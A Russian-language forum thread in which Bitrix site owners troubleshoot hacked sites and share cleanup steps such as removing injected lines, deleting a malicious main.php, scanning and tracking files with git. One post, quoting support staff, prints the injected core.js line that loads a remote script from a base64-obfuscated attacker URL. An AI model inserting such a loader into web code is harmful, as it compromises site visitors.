17.10.2022 01:48:59
Вот консоль гугла с файлами на которые он ругается.
|
|
|
|
17.10.2022 04:06:53
Такая же проблема с админкой
![]() |
|
|
|
17.10.2022 06:18:55
|
|||
|
|
17.10.2022 06:43:58
тут не понял ... где и что я должен видеть ![]() у меня был такой код и админка поднялась у Вас видимо иначе, но судя по скриншоту консоль лога проблема именно в core.js скиньте ссылку на него - гляну |
|||
|
|
17.10.2022 06:50:41
напишите на почту
|
|
|
|
17.10.2022 09:03:17
У одного из клиентов тоже после удаления этих записей админка поднялась. Сменил права на эти файлы на root. Самый простой способ защититься. |
|||
|
|
17.10.2022 09:06:09
Попробуйте удалить его. |
|||||
|
|
17.10.2022 09:08:26
Там в консоли еще много файлов которые ведут в папку админа.Может там что почикали? |
|||
|
|
17.10.2022 09:14:05
|
|||
|
|
17.10.2022 09:19:41
Значит проблема в другом файле. Остается поиск. Ещё модно просканировать бесплатным imunifyav. |
|||
|
|
17.10.2022 09:20:56
первые сообщения в консоли какие? на что ругается?
|
|
|
|
18.10.2022 16:23:37
Техподдержка Битрикс:
У вас в файле /bitrix/modules/main/include/prolog.php были добавлены строки вызывающие скрипт: // \n<sc ript src="
В файл /bitrix/js/main/core/core.js была добавлена строка: \bs=document.createElement(script);s.src=atob(aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz);document.head.appendChild(s);
Сайт заработал корректно только после ручного удаления вредоносных строк. А также удалил вам вирусный файл /bitrix/components/bitrix/main.file.input/main.php То есть у всех, кто писал выше не хватает удаления main.php |
|
|
|
19.10.2022 01:48:44
|
|||
|
|
19.10.2022 08:17:24
это само собой,
а дайте ссылку на первых трех страницах о том, что нужно удалить main.php Я видимо пропустил |
|
|
|
19.10.2022 09:15:22
|
|||
|
|
19.10.2022 12:55:49
Интересно, что недавно мне встретилось 2 сайта, которые были хакнуты еще в конце июня, но вредоносный код начал работать только сейчас. Вероятно имеет смысл вообще все сайты на Битрикс проверять на наличие вредоносных файлов ))
мои проекты:
|
|
|
|
19.10.2022 13:04:29
|
|||
|
|
19.10.2022 13:25:19
Агзамов Раиль, а у нас просто испортили файл prolog.php. Видимо код был рассчитан на то, что в конце php файла обязательно будет ?>
мои проекты:
|
|
|
|
20.10.2022 10:27:58
Сегодня или вчера тоже отвалился один сайт на bitrix env у знакомого
все оч старое, битрикс тоже вылечилось удалением пары строк в prolog.php и core.js файлы с правками от 30 июня, бахнуло только на днях. бд не тронута |
|
|
|
20.10.2022 14:47:16
Подскажите, кто-нибудь пробовал подключать git? Где-то читал, что подключение к git позволяет отслеживать измененные файлы и оперативно откатывать из репозитория. У кого-то был данный опыт?
|
|
|
|
20.10.2022 15:43:48
Да, гит отличное решение. Но обычно как раз битриксовый движек исключают из гита, но в данном случае наверное лучше весь сайт (кроме upload и кеша) туда бахнуть. В принципе можно в исключения всякую статику добавить типа картинок и архивов. |
|||
|
|
20.10.2022 18:39:00
|
|||
|
|
20.10.2022 19:05:38
|
||||
|
|
|||